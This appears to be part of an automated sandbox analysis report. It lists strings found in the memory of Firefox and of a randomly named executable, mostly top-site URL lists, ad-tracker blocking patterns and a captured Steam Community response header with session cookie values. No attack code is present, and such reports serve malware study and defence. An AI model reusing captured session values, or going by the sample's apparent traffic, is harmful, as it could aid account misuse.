Source: firefox.exe, 00000017.00000002.3163888580.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3055319018.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3179092949.000002882E20B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3055319018.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3119588541.00000288245AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3119588541.00000288245E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123804190.0000028825286000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com equals www.youtube.com (Youtube)
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba24e9977faccad43253; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=ebc308d98aa9a096fd906b91; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 24 Oct 2024 06:38:32 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3123219764.0000028825105000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3123219764.0000028825105000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F825000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000017.00000002.3091500089.000002881F825000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000017.00000002.3123219764.000002882510C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F87B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: devtools.debugger.remote-websocketdevtools-commandkey-profiler-captureand deploy previews URLs are allowed.DevTools telemetry entry point failed: devtools-commandkey-profiler-start-stop@mozilla.org/dom/slow-script-debug;1{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}DevToolsStartup.jsm:handleDebuggerFlagFailed to listen. Listener already attached.Failed to listen. Callback argument missing.devtools/client/framework/devtoolsFailed to execute WebChannel callback:No callback set for this channel.JSON Viewer's onSave failed in startPersistence@mozilla.org/network/protocol;1?name=filedevtools.debugger.features.javascript-tracing@mozilla.org/uriloader/handler-service;1Got invalid request to save JSON dataWebChannel/this._originCheckCallback@mozilla.org/network/protocol;1?name=defaultreleaseDistinctSystemPrincipalLoaderresource://devtools/server/devtools-server.jsbrowser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNamesbrowser and that URL. Falling back to devtools/client/framework/devtools-browser^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$Unable to start devtools server on devtools.performance.recording.ui-base-urlresource://devtools/shared/security/socket.jsdevtools.performance.popup.feature-flagdevtools-commandkey-javascript-tracing-togglehttps://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?Can't invoke URIFixup in the content processget FIXUP_FLAG_FORCE_ALTERNATE_URI^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$){33d75835-722f-42c0-89cc-44f328e56a86}get FIXUP_FLAGS_MAKE_ALTERNATE_URI{c6cf88b7-452e-47eb-bdc9-86e3561648ef}_injectDefaultProtocolHandlersIfNeededgecko.handlerService.defaultHandlersVersionget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPextractScheme/fixupChangedProtocol<isDownloadsImprovementsAlreadyMigratedhttp://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjshttp://www.inbox.lv/rfc2368/?value=%sresource://gre/modules/NetUtil.sys.mjs@mozilla.org/uriloader/dbus-handler-app;1@mozilla.org/uriloader/web-handler-app;1@mozilla.org/uriloader/local-handler-app;1handlerSvc fillHandlerInfo: don't know this typeScheme should be either http or https^([a-z+.-]+:\/{0,3})*([^\/@]+@).+browser.fixup.domainsuffixwhitelist.resource://gre/modules/FileUtils.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.yahoo.co.jp/compose/?To=%shttps://mail.inbox.lv/compose?to=%sresource://gre/modules/JSONFile.sys.mjs_finalizeInternal/this._finalizePromise<extension/bing@search.mozilla.org/extendedData equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3055319018.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/https://www.wikipedia.org/OptionalPermissionNoPrompt^[a-z0-9-._]*@[a-z0-9-._]+$main/nimbus-desktop-experiments[addon]google@search.mozilla.org passed to getLocalizedTitle!The parent guid is not valid (Can't insert into the root.SELECTION_IME_SELECTEDRAWTEXTSELECTION_IME_CONVERTEDTEXTwikipedia@search.mozilla.orgbound #nimbusSearchUpdated equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3055319018.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
